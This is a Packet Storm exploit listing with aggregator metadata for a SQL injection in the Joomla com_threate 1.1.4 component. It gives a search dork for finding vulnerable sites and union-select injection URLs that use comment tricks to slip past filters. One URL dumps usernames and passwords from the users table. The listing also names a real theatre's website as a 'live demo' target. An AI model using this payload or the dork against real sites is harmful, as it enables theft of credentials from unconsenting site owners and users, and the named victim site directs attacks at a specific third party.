ID PACKETSTORM:137843
Type packetstorm
Reporter xBADGIRL21
Modified 2016-07-10T00:00:00
Description
`######################
# Exploit Title : Joomla com_threate 1.1.4 SQL injection
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_threate
# version: 1.1.4
# Vendor Homepage : http://joomlic.com/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/09
# video Proof : https://youtu.be/WXqrK7dqGaY
######################
# PoC:
# [id=] Get Parameter Vulnerable To SQL
#
# http://server/index.php?option=com_theatre&view=show&id=[SQLi]
#
# Demo
# http://server/index.php?option=com_theatre&view=show&id=36'
#
# http://server/index.php?option=com_theatre&view=show&id=-36
/*!12345union*/ select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
#
# http://server/index.php?option=com_theatre&view=show&id=-36
/*!12345union*/ select
1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
from aur_users--
#
# Live Demo :
# https://www.auroratheatre.org/
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
`
{"hash": "c00178b3ae9dc9119013a1b2d7ecd5250beb96df5ac803ca51897f3cb0368e3b", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 2, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/137843/Joomla-Threate-1.1.4-SQL-Injection.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "1ee5362a60c6ec03f86d4a9aafba9af6"}, {"key": "modified", "hash": "5d710bd0f383627aaac67e5bdcc7fa5e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5d710bd0f383627aaac67e5bdcc7fa5e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "182369e088a70351af68e956335cbea7"}, {"key": "sourceData", "hash": "a885661052ce458b5bb2015fc6535ad2"}, {"key": "sourceHref", "hash": "2dae0e3a2194b6dfc0bf1bd18062eeb4"}, {"key": "title", "hash": "19947eef68b9ae5d28c4ef8bb3a870e6"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "2016-07-10T00:00:00", "modified": "2016-07-10T00:00:00", "title": "Joomla Threate 1.1.4 SQL Injection", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/137843/joomlathreate-sql.txt", "history": [], "reporter": "xBADGIRL21", "lastseen": "2016-11-03T10:26:38", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2016-11-03T10:26:38"}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:38"}, "vulnersScore": 0.4}, "sourceData": "`###################### \n# Exploit Title : Joomla com_threate 1.1.4 SQL injection \n# Exploit Author : xBADGIRL21 \n# Dork : index.php?option=com_threate \n# version: 1.1.4 \n# Vendor Homepage : http://joomlic.com/ \n# Tested on: [ Windows ] \n# skype:xbadgirl21 \n# Date: 2016/07/09 \n# video Proof : https://youtu.be/WXqrK7dqGaY \n###################### \n# PoC: \n# [id=] Get Parameter Vulnerable To SQL \n# \n# http://server/index.php?option=com_theatre&view=show&id=[SQLi] \n# \n# Demo \n# http://server/index.php?option=com_theatre&view=show&id=36' \n# \n# http://server/index.php?option=com_theatre&view=show&id=-36 \n/*!12345union*/ select \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 \n# \n# http://server/index.php?option=com_theatre&view=show&id=-36 \n/*!12345union*/ select \n1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 \nfrom aur_users-- \n# \n# Live Demo : \n# https://www.auroratheatre.org/ \n# \n###################### \n# Discovered by : xBADGIRL21 \n# Greetz : All Mauritanien Hackers - NoWhere \n####################### \n`\n", "id": "PACKETSTORM:137843"}
{}